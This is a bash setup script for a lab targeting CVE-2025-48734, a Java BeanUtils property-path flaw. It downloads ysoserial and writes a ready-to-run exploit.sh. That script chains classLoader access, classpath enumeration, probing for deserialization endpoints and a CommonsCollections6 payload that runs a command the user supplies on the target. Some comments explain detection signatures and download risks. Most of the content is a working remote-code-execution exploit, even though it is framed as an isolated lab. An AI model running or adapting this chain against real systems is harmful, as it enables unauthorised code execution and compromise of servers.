#!/usr/bin/env bash
set -euo pipefail
# ============================================
# CVE-2025-48734 Lab - Kali Attack Tools
# Use ONLY in an isolated lab environment
# ============================================
# Setup script: installs dependencies, fetches ysoserial into $TOOLS_DIR and
# writes a companion exploit.sh next to it.
# Arguments: $1 target host, $2 port (defaults below). Here they are only used
# for the usage hint printed at the end; exploit.sh re-reads its own copies of
# them at run time, so BASE_URL and pretty() below are unused by this script.
TARGET="${1:-10.211.55.10}"
PORT="${2:-8080}"
BASE_URL="http://$TARGET:$PORT"
TOOLS_DIR="$HOME/lab-tools"
YSOSERIAL_URL="https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar"
# Pretty-print JSON from stdin. NOTE(review): python3 reads stdin to EOF before
# it fails on non-JSON input, so the `|| cat` fallback sees an empty stream and
# prints nothing instead of the raw body. The same definition is written into
# exploit.sh below.
pretty() { python3 -m json.tool 2>/dev/null || cat; }
mkdir -p "$TOOLS_DIR"
cd "$TOOLS_DIR"
# ---------- Dependencies ----------
# apt-get normally needs root; under `set -e` a failure here aborts the script.
echo "[*] Checking dependencies..."
apt-get update -q
apt-get install -y --no-install-recommends curl python3 default-jdk
# ---------- Download ysoserial ----------
# Fetches the "latest" release jar with no pinned version and no checksum or
# signature check. exploit.sh later runs it with `java -jar`, so whatever is
# served at this URL executes with the lab user's privileges; pin a release
# and verify a digest if this setup is re-run over time. `curl -s` also hides
# transfer errors, though a non-zero exit still aborts under `set -e`.
if [ ! -f ysoserial-all.jar ]; then
echo "[*] Downloading ysoserial..."
curl -sL "$YSOSERIAL_URL" -o ysoserial-all.jar
else
echo "[*] ysoserial already downloaded"
fi
# ---------- Chained attack script ----------
# The quoted delimiter means the body is written to exploit.sh verbatim (no
# expansion here). exploit.sh does not enable set -e/-u, so a failed curl or a
# python3 parse error inside it leaves the variables empty rather than aborting.
# What it does, phase by phase:
#   1. reads bean properties via /api/property?path=... and treats a successful
#      read of status.declaringClass (then .classLoader) as the CVE indicator;
#   2. walks the class loader's URLs[n] entries looking for commons-collections-3;
#   3. posts the 4-byte Java serialization stream header (\xac\xed\x00\x05) to
#      candidate endpoints and keys on EOFException/success/error in the reply;
#   4. builds a CommonsCollections6 payload with ysoserial from $3 and posts it.
# Detection notes: property-path requests walking declaringClass/classLoader/
# URLs, and application/octet-stream bodies starting with the 0xACED0005
# serialization magic on endpoints not meant to receive serialized Java
# objects, are both distinctive in access logs and easy to alert on.
cat > exploit.sh << 'EXPLOITEOF'
#!/usr/bin/env bash
TARGET="${1:-10.211.55.10}"
PORT="${2:-8080}"
BASE_URL="http://$TARGET:$PORT"
TOOLS_DIR="$(dirname "$0")"
pretty() { python3 -m json.tool 2>/dev/null || cat; }
echo ""
echo "============================================="
echo " PHASE 1 - Initial Reconnaissance"
echo "============================================="
echo "[*] Probing simple bean properties..."
curl -s "$BASE_URL/api/property?path=id" | pretty
echo ""
curl -s "$BASE_URL/api/property?path=status" | pretty
echo ""
echo "[*] Attempting access to declaringClass (CVE-2025-48734)..."
RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass")
echo "$RESULT" | pretty
echo ""
STATUS=$(echo "$RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null)
if [ "$STATUS" != "success" ]; then
echo "[-] declaringClass blocked - application is PATCHED. Aborting."
exit 1
fi
echo "[+] CVE-2025-48734 CONFIRMED - declaringClass accessible"
echo ""
echo "[*] Escalating to ClassLoader..."
CL_RESULT=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader")
echo "$CL_RESULT" | pretty
echo ""
CL_TYPE=$(echo "$CL_RESULT" | python3 -c "import sys,json; print(json.load(sys.stdin).get('valueClass',''))" 2>/dev/null)
echo "[+] ClassLoader obtained: $CL_TYPE"
echo ""
echo "============================================="
echo " PHASE 2 - Classpath Enumeration via CVE"
echo "============================================="
echo "[*] Iterating ClassLoader URLs via BeanUtils index notation..."
CC="NOT FOUND"
IDX=0
CLASSPATH_ENTRIES=()
while true; do
ENTRY=$(curl -s "$BASE_URL/api/property?path=status.declaringClass.classLoader.URLs%5B${IDX}%5D")
ESTATUS=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('status',''))" 2>/dev/null)
if [ "$ESTATUS" != "success" ]; then
break
fi
VAL=$(echo "$ENTRY" | python3 -c "import sys,json; print(json.load(sys.stdin).get('value',''))" 2>/dev/null)
CLASSPATH_ENTRIES+=("$VAL")
echo " [$IDX] $VAL"
if echo "$VAL" | grep -q "commons-collections-3"; then
CC="FOUND"
fi
IDX=$((IDX + 1))
done
echo ""
if [ "$CC" = "NOT FOUND" ]; then
echo "[-] Commons Collections 3.x not found in classpath."
echo "[-] No gadget chain available. Aborting."
exit 1
fi
echo "[+] Commons Collections 3.x found - gadget chain available"
echo ""
echo "============================================="
echo " PHASE 3 - Deserialization Endpoint Discovery"
echo "============================================="
echo "[*] Fuzzing common import/sync endpoints..."
DESER_ENDPOINT=""
for path in "/api/data/import" "/api/import" "/api/sync" "/api/upload" "/api/data/sync"; do
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$BASE_URL$path" \
-H "Content-Type: application/octet-stream" \
--data-binary $'\xac\xed\x00\x05')
echo " POST $path → HTTP $CODE"
if [ "$CODE" = "200" ] || [ "$CODE" = "400" ]; then
# Verify ObjectInputStream by checking for EOFException signature
RESP=$(curl -s -X POST "$BASE_URL$path" \
-H "Content-Type: application/octet-stream" \
--data-binary $'\xac\xed\x00\x05')
if echo "$RESP" | grep -q "EOFException\|success\|error"; then
DESER_ENDPOINT="$path"
echo "[+] Deserialization endpoint found: $path"
break
fi
fi
done
echo ""
if [ -z "$DESER_ENDPOINT" ]; then
echo "[-] No deserialization endpoint found. Aborting."
exit 1
fi
echo "============================================="
echo " PHASE 4 - Payload Generation and Delivery"
echo "============================================="
if [ $# -lt 3 ]; then
echo "[!] Usage: $0 <target> <port> <command>"
echo "[!] Example: $0 10.211.55.10 8080 'id'"
exit 1
fi
CMD="$3"
PAYLOAD_FILE="$TOOLS_DIR/payload.ser"
echo "[*] Generating ysoserial payload..."
echo " Chain: CommonsCollections6"
echo " Command: $CMD"
echo ""
java \
--add-opens java.base/java.util=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
--add-opens java.base/java.text=ALL-UNNAMED \
--add-opens java.desktop/java.awt.font=ALL-UNNAMED \
-jar "$TOOLS_DIR/ysoserial-all.jar" CommonsCollections6 "$CMD" > "$PAYLOAD_FILE" 2>/dev/null
echo "[*] Payload generated: $PAYLOAD_FILE ($(wc -c < "$PAYLOAD_FILE") bytes)"
echo "[*] Sending to endpoint $DESER_ENDPOINT..."
echo ""
curl -s -X POST "$BASE_URL$DESER_ENDPOINT" \
-H "Content-Type: application/octet-stream" \
--data-binary "@$PAYLOAD_FILE" | pretty
echo ""
echo "============================================="
echo " SUMMARY"
echo "============================================="
echo " CVE-2025-48734: EXPLOITED"
echo " Classpath via CVE: Commons Collections 3.x found"
echo " Deser endpoint: $BASE_URL$DESER_ENDPOINT"
echo " Payload: CommonsCollections6"
echo " Command executed: $CMD"
echo "============================================="
EXPLOITEOF
chmod +x exploit.sh
# Usage hint only; the third argument shown here becomes $3 in exploit.sh, which
# hands it to ysoserial as the command embedded in the payload.
echo ""
echo "============================================="
echo " Tools ready in: $TOOLS_DIR"
echo "============================================="
echo " Usage:"
echo " ./exploit.sh $TARGET $PORT 'id'"
echo " ./exploit.sh $TARGET $PORT 'bash -c {id,}>/tmp/out.txt'"
echo "============================================="